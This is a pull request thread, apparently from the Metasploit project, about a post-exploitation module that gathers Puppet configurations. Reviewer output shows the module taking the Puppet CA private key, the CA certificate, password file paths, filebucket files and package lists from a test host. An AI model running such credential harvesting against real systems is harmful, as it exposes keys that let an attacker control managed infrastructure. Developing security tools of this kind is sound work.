Puppet: post module to gather configs and such

[h00die]

This PR adds a post gather module to get puppet configs and sensitive files!

Verification

see individual markdowns for instructions

[h00die]

keep a WIP as the agent deployer is close, but not 100% yet, but figured this is a heads up that its being worked.

[h00die]

don't think i'm going to get back around to puppet, unless theres a puppet admin who wants to explain things to me, as its too confusing to actually use.

[jheysel-r7]

don't think i'm going to get back around to puppet, unless theres a puppet admin who wants to explain things to me, as its too confusing to actually use.

No worries @h00die - does this mean this PR can be closed? Or is it ready for review in the state that it's in?

[h00die]

Ready for review in it's current state. My original idea to have a node deployer hasn't planned out as I can't seem to understand how puppet works

[jheysel-r7]

Thanks for the module @h00die! Looking good, just a couple minor comments.

msf6 post(linux/gather/puppet) > rexploit
[*] Reloading module...

[+] Stored puppet config to: /Users/jheysel/.msf4/loot/20240124105544_default_172.22.0.3_puppet.conf_973478.txt
[+] Puppet Configuration
====================

 Parameter  Value                                        Loot Location
 ---------  -----                                        -------------
 cacert     /etc/puppetlabs/puppetserver/ca/ca_crt.pem   /Users/jheysel/.msf4/loot/20240124105545_default_172.22.0.3_etcpuppetlabs_488284.txt
 cakey      /etc/puppetlabs/puppetserver/ca/ca_key.pem   /Users/jheysel/.msf4/loot/20240124105545_default_172.22.0.3_etcpuppetlabs_252907.txt
 passfile   /etc/puppetlabs/puppet/ssl/private/password
 server     puppet
 user       puppet

[+] Stored facter to: /Users/jheysel/.msf4/loot/20240124105546_default_172.22.0.3_puppet.modules_861636.txt
[+] Puppet Modules
==============

 Module             Version
 ------             -------
 puppetlabs-apache  v12.0.2
 puppetlabs-concat  v9.0.2
 puppetlabs-stdlib  v9.4.1

[+] Puppet Filebucket Files
=======================

 Hash                                                              Date                 Filename       Loot location
 ----                                                              ----                 --------       -------------
 f2ca1bb6c7e907d06dafe4687e579fce76b37e4e93b7605022da52e6ccc26fd2  2024-01-24 02:24:18  /tmp/TestFile  /Users/jheysel/.msf4/loot/20240124105550_default_172.22.0.3_puppet.filebucke_436017.txt

[+] Stored facter to: /Users/jheysel/.msf4/loot/20240124105551_default_172.22.0.3_puppet.facter_573034.txt
[+] Stored packages to: /Users/jheysel/.msf4/loot/20240124105554_default_172.22.0.3_puppet.packages_036470.txt
[+] Puppet Packages
===============

 Package                   Version                                  Source
 -------                   -------                                  ------
 adduser                   3.118ubuntu5                             apt
 apt                       2.4.11                                   apt
 base-files                12ubuntu4.4                              apt
 base-passwd               3.5.52build1                             apt
 base64                    0.2.0                                    puppet_gem
 bash                      5.1-6ubuntu1                             apt
 
 <redacted>
 
 yaml                      0.1.0                                    puppet_gem
 zlib                      1.1.0                                    puppet_gem
 zlib1g                    1:1.2.11.dfsg-2ubuntu9.2                 apt

[*] Post module execution completed

[h00die]

Thanks for the patience @jheysel-r7 . I think I've now resolved everything

[jheysel-r7]

Thanks for pushing those update @h00die, looking good!

msf6 post(linux/gather/puppet) > run

[+] Stored puppet config to: /Users/jheysel/.msf4/loot/20240130191621_default_172.27.0.2_puppet.conf_558748.txt
[+] Puppet Configuration
====================

 Parameter  Value                                        Loot Location
 ---------  -----                                        -------------
 cacert     /etc/puppetlabs/puppetserver/ca/ca_crt.pem   /Users/jheysel/.msf4/loot/20240130191621_default_172.27.0.2_etcpuppet
                                                         labs_938484.txt
 cakey      /etc/puppetlabs/puppetserver/ca/ca_key.pem   /Users/jheysel/.msf4/loot/20240130191622_default_172.27.0.2_etcpuppet
                                                         labs_663779.txt
 passfile   /etc/puppetlabs/puppet/ssl/private/password
 server     puppet
 user       puppet

[+] Stored facter to: /Users/jheysel/.msf4/loot/20240130191623_default_172.27.0.2_puppet.modules_948156.txt
[+] Stored facter to: /Users/jheysel/.msf4/loot/20240130191627_default_172.27.0.2_puppet.facter_144831.txt
[+] Stored packages to: /Users/jheysel/.msf4/loot/20240130191629_default_172.27.0.2_puppet.packages_623111.txt
[+] Puppet Packages
===============

 Package                   Version                                  Source
 -------                   -------                                  ------
 adduser                   3.118ubuntu5                             apt
 apt                       2.4.11                                   apt
 base-files                12ubuntu4.4                              apt
...
 zlib                      1.1.0                                    puppet_gem
 zlib1g                    1:1.2.11.dfsg-2ubuntu9.2                 apt

[*] Post module execution completed

[jheysel-r7]

Release Notes

This PR adds a post gather module to get Puppet configs and other sensitive files.